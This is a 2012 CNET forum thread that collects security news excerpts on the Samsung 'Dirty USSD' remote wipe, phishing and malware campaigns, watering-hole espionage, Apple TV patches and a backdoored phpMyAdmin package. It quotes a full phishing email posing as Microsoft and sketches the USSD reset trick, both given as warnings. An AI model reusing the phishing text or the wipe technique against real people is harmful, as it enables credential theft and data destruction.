NEWS - September 25, 2012

'Dirty USSD' Hack Wipes Samsung Phones. Is Yours Vulnerable?

If you own a Samsung smartphone from a U.S. cell phone operator, you may want to avoid using the Internet until your carrier patches a pretty simple flaw that would let an attacker reset your phone.

On Tuesday, researcher Ravi Borgaonkar demonstrated how he wiped out a Samsung Galaxy SIII simply by opening a website containing an HTML tag for a call function, and replacing the telephone number with the USSD code for a factory reset. USSD codes are commands that are executed by entering them in your keypad—for instance if you dial #*#INFO"*" you can access certain menu settings. For every Samsung phone running Touchwiz, there's a unique set of USSD codes that performs various commands.

The problem appears to lie within both the Samsung dialer and Touchwiz's stock Android browser. Unlike most dialers, Samsung's automatically makes the call while others still require the user to hit "send." Borgaonkar noted that the code can be sent from a website or pushed to the handset by a Charlie Miller-like NFC attack, or through a malicious QR code, in which case absolutely no user interaction is necessary.

But here's the kicker.

Continued :

Remote resetting a Samsung phone made easy
Researcher shows Samsung Galaxy S3 remote data-wipe hack
Samsung Galaxy S3 'vulnerable' to remote malicious reset
Discussion is locked
Reply to: NEWS - September 25, 2012
PLEASE NOTE: Do not post advertisements, offensive materials, profanity, or personal attacks. Please remember to be considerate of other members. If you are new to the CNET Forums, please read our CNET Forums FAQ. All submitted content is subject to our Terms of Use.
Reporting: NEWS - September 25, 2012
This post has been flagged and will be reviewed by our staff. Thank you for helping us maintain CNET's great community.
Sorry, there was a problem flagging this post. Please try again now or at a later time.
If you believe this post is offensive or violates the CNET Forums' Usage policies, you can report it below (this will not automatically remove the post). Once reported, our moderators will be notified and the post will be reviewed.
- Collapse -
Microsoft Windows Update emails try to steal your Gmail,
Microsoft Windows Update emails try to steal your Gmail, Yahoo, AOL passwords...

Beware any emails which claim to come from - it could be that you're being targeted in an attack designed to steal your AOL, Gmail, Yahoo or Windows Live password.

At first glance, if you don't look too carefully, the emails entitled "Microsoft Windows Update" may appear harmless enough. But the grammatical errors and occasional odd language should raise alarms bells that the emails may not really be from Microsoft. [Screenshot]

Dear Windows User,
It has come to our attention that your Microsoft windows Installation records are out of date. Every Windows installation has to be tied to an email account for daily update.

This requires you to verify the Email Account. Failure to verify your records will result in account suspension. Click on the Verify button below and enter your login information on the following page to confirm your records.


Thank you,

Microsoft Windows Team.

If you do make the mistake of clicking on the link you are taken to a third party website (not the real, where you are warned that your computer is at high risk and told to choose between logging in via Gmail, Windows Live, Yahoo or AOL. [Screenshot]

Continued :
- Collapse -
Espionage Hackers Target 'Watering Hole' Sites

Security experts are accustomed to direct attacks, but some of today's more insidious incursions succeed in a roundabout way — by planting malware at sites deemed most likely to be visited by the targets of interest. New research suggests these so-called "watering hole" tactics recently have been used as stepping stones to conduct espionage attacks against a host of targets across a variety of industries, including the defense, government, academia, financial services, healthcare and utilities sectors.

Some of the earliest details of this trend came in late July 2012 from RSA FirstWatch, which warned of an increasingly common attack technique involving the compromise of legitimate websites specific to a geographic area which the attacker believes will be visited by end users who belong to the organization they wish to penetrate.

At the time, RSA declined to individually name the Web sites used in the attack. But the company shifted course somewhat after researchers from Symantec this month published their own report on the trend (see The Elderwood Project). Taken together, the body of evidence supports multiple, strong connections between these recent watering hole attacks and the Aurora intrusions perpetrated in late 2009 against Google and a number of other high-profile targets.

Continued :

Also: Large-Scale Water Holing Attack Campaigns Hitting Key Targets

- Collapse -
New Twitter-Based Malware Uses Direct Messaging to Spread

Sophos is warning of a new trick to get Twitter users to open direct messages from trusted users that ultimately infect their machines with malware.

In a blog post, senior technology consultant Graham Clulely said the initial message is a tweet claiming the recipient's been captured on a Facebook video. One version makes it sound like something scandalous was taped without the person's knowledge.

Click the link and a video player pops up with a warning that an update for Youtube Player is needed. But instead of FlashPlayerV10.1.57.108.exe, it's actually a backdoor Trojan that copies itself to accessible drives and network shares.

"Quite how users' Twitter accounts became compromised to send the malicious DMs in the first place isn't currently clear, but the attack underlines the importance of not automatically clicking on a link just because it appeared to be sent to you by a trusted friend," Clulely wrote.

"If you do find that it was your Twitter account sending out the messages, the sensible course of action is to assume the worst, change your password (make sure it is something unique, hard-to-guess and hard-to-crack) and revoke permissions of any suspicious applications that have access to your account."

Continued :

- Collapse -
Apple fixes security vulnerabilities w/ Apple TV 5.1 update

Less than one week after iOS 6 arrived, Apple has released Update 5.1 for its 2nd and 3rd generation iOS-based Apple TV devices, adding several new features and closing a number of important security holes. According to Apple, Apple TV 5.1 addresses a total of 21 problems, some of which could be exploited by a remote attacker to, for example, cause a denial-of-service (DoS), determine which networks a device has previously accessed, or even execute arbitrary code on the device.

These include vulnerabilities in the LibXML library used by Apple TV, memory corruption problems in JavaScriptCore and the LibPNG library, a stack buffer overflow in ICU locale ID handling, an integer overflow, a double free bug in ImageIO's handling of JPEG images and a buffer overflow in the LibTIFF library. For an attack to be successful, a victim must connect to a malicious Wi-Fi network, or open a specially crafted movie or image file.

Continued :

Also: Apple TV vulnerabilities closed after being watched for months

See Vulnerabilities & Fixes - Apple TV Multiple Vulnerabilities

- Collapse -
Facebook denies reports of major privacy breach despite user
.. complaints

"Old private messages between Facebook users suddenly appear on viewable Timelines, according to several reports:

Facebook today denied news reports of a major privacy breach involving users who saw their private messages from 2009 and before suddenly appearing on their viewable Timeline as messages posted by their friends.

Users reported seeing their private messages, along with viewable wall posts appearing under the "Friends" box in Facebook's Timeline view, according to the news reports. This reporter's Facebook account did not appear to have the problem.

TechCrunch, one of the news sites that carried the story, reported receiving several emails from readers complaining about seeing their older private messages suddenly viewable to others.

The author of the TechCrunch story reported seeing the problem on her own Facebook page and on some of her friends' timelines as well. The issue has surfaced in the US and elsewhere, but does not appear to affect all Facebook users, according to TechCrunch.


Also: Despite statements from Facebook to the contrary, users are still claiming to see private messages in their Timelines
- Collapse -
Fake 'KLM e-Ticket' attempts to install backdoor

From Websense Security:

Fake airline e-ticket emails containing malicious attachments are far from new. However, the Websense ThreatSeeker Network has detected a significant campaign purporting to originate from KLM, the Dutch flagship airline. We estimate we intercepted more than 850,000 messages from this campaign on Monday, September 17, alone.

Each malicious message, with a subject 'KLM e-Ticket', appears to use a legitimate KLM e-ticket layout, but itinerary information is not displayed. Instead, users are enticed to view the itinerary in an attachment and subsequently risk compromising their machines. Although this scam does not specifically target KLM customers, those who have made recent ticket purchases as well as recipients who may fear that an unauthorized credit card purchase has been made could fall victim. Websense customers are protected from this and other threats by ACE our Advanced Classification Engine.

We analyzed a sample set of messages, and noted that each 'e-ticket' contained unique values in the passenger and receipt sections (presumably an attempt to avoid detection), along with a malicious zipped attachment named 'KLM-e-Ticket_<NumericalValue>.zip'. [Screenshot]

Continued :

- Collapse -
Questions abound as malicious phpMyAdmin backdoor found on..
.. SourceForge site

"Secret code added to the package gives attackers the ability to hijack servers."

Developers of phpMyAdmin warned users they may be running a malicious version of the open-source software package after discovering backdoor code was snuck into a package being distributed over the widely used SourceForge repository.

The backdoor contains code that allows remote attackers to take control of the underlying server running the modified phpMyAdmin, which is a Web-based tool for managing MySQL databases. The PHP script is found in a file named server_sync.php, and it reads PHP code embedded in standard POST Web requests and then executes it. That allows anyone who knows the backdoor is present to execute code of his choice. HD Moore, CSO of Rapid7 and chief architect of the Metasploit exploit package for penetration testers and hackers, told Ars a module has already been added that tests for the vulnerability.

The backdoor is concerning because it was distributed on one of the official mirrors for SourceForge, which hosts more than 324,000 open-source projects, serves more than 46 million consumers, and handles more than four million downloads each day. SourceForge officials are still investigating the breach, so crucial questions remain unanswered. It's still unclear, for instance, if the compromised server hosted other maliciously modified software packages, if other official SourceForge mirror sites were also affected, and if the central repository that feeds these mirror sites might also have been attacked.

Continued :

Also: Malicious phpMyAdmin served from SourceForge mirror

CNET Forums